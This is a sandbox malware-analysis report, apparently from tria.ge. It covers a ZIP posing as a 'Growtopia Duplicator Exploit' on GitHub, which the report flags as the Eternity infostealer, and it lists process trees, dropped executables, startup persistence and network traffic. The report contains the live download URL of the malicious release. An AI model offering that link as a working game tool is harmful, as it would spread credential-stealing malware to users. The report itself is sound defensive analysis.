Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2023, 13:52 UTC

General

  • Target

    https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip

Score
10/10

Malware Config

Signatures

  • Detects Eternity stealer 2 IoCs
  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:8
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ec1946f8,0x7ff8ec194708,0x7ff8ec194718
      2⤵
        PID:3140
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
        2⤵
          PID:4868
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
          2⤵
            PID:1636
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4524
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
            2⤵
              PID:572
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
              2⤵
                PID:2188
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
                2⤵
                  PID:1484
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
                  2⤵
                    PID:2208
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
                    2⤵
                      PID:4152
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4992
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5548 /prefetch:8
                      2⤵
                        PID:556
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
                        2⤵
                          PID:4456
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1320
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
                          2⤵
                            PID:4428
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
                            2⤵
                              PID:1844
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
                              2⤵
                                PID:3308
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3929024001078929481,17588997358885815400,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3440 /prefetch:2
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4884
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2516
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4392
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:2168
                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe"
                                    1⤵
                                    • Drops startup file
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2292
                                    • C:\Users\Admin\AppData\Local\Temp\dcd.exe
                                      "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3180
                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe"
                                    1⤵
                                    • Drops startup file
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5084
                                    • C:\Users\Admin\AppData\Local\Temp\dcd.exe
                                      "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
                                      2⤵
                                      • Executes dropped EXE
                                      PID:4836
                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Temp1_GT.Duplicator.Exploit.zip\GT Duplicator Exploit\SystemFreezer.exe"
                                    1⤵
                                    • Drops startup file
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:628
                                    • C:\Users\Admin\AppData\Local\Temp\dcd.exe
                                      "C:\Users\Admin\AppData\Local\Temp\dcd.exe" -path=""
                                      2⤵
                                      • Executes dropped EXE
                                      PID:4836

                                  Network

                                  • flag-us
                                    DNS
                                    67.31.126.40.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    67.31.126.40.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    github.com
                                    msedge.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    github.com
                                    IN A
                                    Response
                                    github.com
                                    IN A
                                    140.82.121.4
                                  • flag-de
                                    GET
                                    https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip
                                    msedge.exe
                                    Remote address:
                                    140.82.121.4:443
                                    Request
                                    GET /L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip HTTP/2.0
                                    host: github.com
                                    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                    sec-ch-ua-mobile: ?0
                                    dnt: 1
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    accept-encoding: gzip, deflate, br
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 302
                                    server: GitHub.com
                                    date: Tue, 28 Nov 2023 13:52:13 GMT
                                    content-type: text/html; charset=utf-8
                                    vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream
                                    cache-control: no-cache
                                    strict-transport-security: max-age=31536000; includeSubdomains; preload
                                    x-frame-options: deny
                                    x-content-type-options: nosniff
                                    x-xss-protection: 0
                                    referrer-policy: no-referrer-when-downgrade
                                    content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.githubcopilot.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com support.github.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
                                    content-length: 0
                                    x-github-request-id: E8B0:62AC:1EBEFC2E:1F304021:6565F08D
                                  • flag-us
                                    DNS
                                    4.121.82.140.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    4.121.82.140.in-addr.arpa
                                    IN PTR
                                    Response
                                    4.121.82.140.in-addr.arpa
                                    IN PTR
                                    lb-140-82-121-4-fragithubcom
                                  • flag-us
                                    DNS
                                    95.221.229.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    95.221.229.192.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    198.1.85.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    198.1.85.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    198.1.85.104.in-addr.arpa
                                    IN PTR
                                    a104-85-1-198deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    objects.githubusercontent.com
                                    msedge.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    objects.githubusercontent.com
                                    IN A
                                    Response
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.108.133
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.109.133
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.110.133
                                    objects.githubusercontent.com
                                    IN A
                                    185.199.111.133
                                  • flag-us
                                    GET
                                    https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream
                                    msedge.exe
                                    Remote address:
                                    185.199.108.133:443
                                    Request
                                    GET /github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream HTTP/2.0
                                    host: objects.githubusercontent.com
                                    dnt: 1
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                    sec-fetch-site: none
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                    sec-ch-ua-mobile: ?0
                                    accept-encoding: gzip, deflate, br
                                    accept-language: en-US,en;q=0.9
                                    Response
                                    HTTP/2.0 200
                                    content-type: application/octet-stream
                                    content-md5: GfO0C695U/IGjsPxSKLBqg==
                                    last-modified: Sun, 19 Nov 2023 12:22:25 GMT
                                    etag: "0x8DBE8FA30AAC443"
                                    server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                    x-ms-request-id: 5edde0d4-001e-0005-1b02-22338e000000
                                    x-ms-version: 2020-04-08
                                    x-ms-creation-time: Sun, 19 Nov 2023 12:22:25 GMT
                                    x-ms-lease-status: unlocked
                                    x-ms-lease-state: available
                                    x-ms-blob-type: BlockBlob
                                    content-disposition: attachment; filename=GT.Duplicator.Exploit.zip
                                    x-ms-server-encrypted: true
                                    via: 1.1 varnish, 1.1 varnish
                                    accept-ranges: bytes
                                    date: Tue, 28 Nov 2023 13:52:14 GMT
                                    age: 0
                                    x-served-by: cache-iad-kcgs7200156-IAD, cache-ams21049-AMS
                                    x-cache: MISS, MISS
                                    x-cache-hits: 0, 0
                                    x-timer: S1701179534.065010,VS0,VE200
                                    content-length: 621971
                                  • flag-us
                                    DNS
                                    133.108.199.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.108.199.185.in-addr.arpa
                                    IN PTR
                                    Response
                                    133.108.199.185.in-addr.arpa
                                    IN PTR
                                    cdn-185-199-108-133githubcom
                                  • flag-us
                                    DNS
                                    9.228.82.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    9.228.82.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    g.bing.com
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    g.bing.com
                                    IN A
                                    Response
                                    g.bing.com
                                    IN CNAME
                                    g-bing-com.a-0001.a-msedge.net
                                    g-bing-com.a-0001.a-msedge.net
                                    IN CNAME
                                    dual-a-0001.a-msedge.net
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    204.79.197.200
                                    dual-a-0001.a-msedge.net
                                    IN A
                                    13.107.21.200
                                  • flag-us
                                    GET
                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
                                    host: g.bing.com
                                    accept-encoding: gzip, deflate
                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                    Response
                                    HTTP/2.0 204
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                    set-cookie: MUID=2A476F7E58156B910E6D7CA9595D6AD8; domain=.bing.com; expires=Sun, 22-Dec-2024 13:52:19 GMT; path=/; SameSite=None; Secure; Priority=High;
                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                    access-control-allow-origin: *
                                    x-cache: CONFIG_NOCACHE
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 3989A48A86A04827AC828F0B5CC2D2FC Ref B: BRU30EDGE0907 Ref C: 2023-11-28T13:52:19Z
                                    date: Tue, 28 Nov 2023 13:52:18 GMT
                                  • flag-us
                                    GET
                                    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
                                    host: g.bing.com
                                    accept-encoding: gzip, deflate
                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                    cookie: MUID=2A476F7E58156B910E6D7CA9595D6AD8
                                    Response
                                    HTTP/2.0 204
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                    access-control-allow-origin: *
                                    x-cache: CONFIG_NOCACHE
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 45C4889E966842BB9B390BD15808588A Ref B: BRU30EDGE0907 Ref C: 2023-11-28T13:52:19Z
                                    date: Tue, 28 Nov 2023 13:52:18 GMT
                                  • flag-us
                                    GET
                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
                                    host: g.bing.com
                                    accept-encoding: gzip, deflate
                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                    cookie: MUID=2A476F7E58156B910E6D7CA9595D6AD8
                                    Response
                                    HTTP/2.0 204
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                    access-control-allow-origin: *
                                    x-cache: CONFIG_NOCACHE
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 1298DE09DCE44B9699EB991884C9C6DB Ref B: BRU30EDGE0907 Ref C: 2023-11-28T13:52:19Z
                                    date: Tue, 28 Nov 2023 13:52:18 GMT
                                  • flag-us
                                    DNS
                                    200.197.79.204.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    200.197.79.204.in-addr.arpa
                                    IN PTR
                                    Response
                                    200.197.79.204.in-addr.arpa
                                    IN PTR
                                    a-0001a-msedgenet
                                  • flag-us
                                    DNS
                                    203.33.253.131.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    203.33.253.131.in-addr.arpa
                                    IN PTR
                                    Response
                                    203.33.253.131.in-addr.arpa
                                    IN PTR
                                    a-0003 dc-msedgenet
                                  • flag-us
                                    DNS
                                    103.169.127.40.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    103.169.127.40.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    15.164.165.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    15.164.165.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    25.14.97.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    25.14.97.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    25.14.97.104.in-addr.arpa
                                    IN PTR
                                    a104-97-14-25deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    google.com
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    google.com
                                    IN A
                                    Response
                                    google.com
                                    IN A
                                    142.250.179.142
                                  • flag-nl
                                    GET
                                    http://google.com/generate_204
                                    SystemFreezer.exe
                                    Remote address:
                                    142.250.179.142:80
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: google.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 204 No Content
                                    Content-Length: 0
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Date: Tue, 28 Nov 2023 13:52:44 GMT
                                  • flag-us
                                    DNS
                                    142.179.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
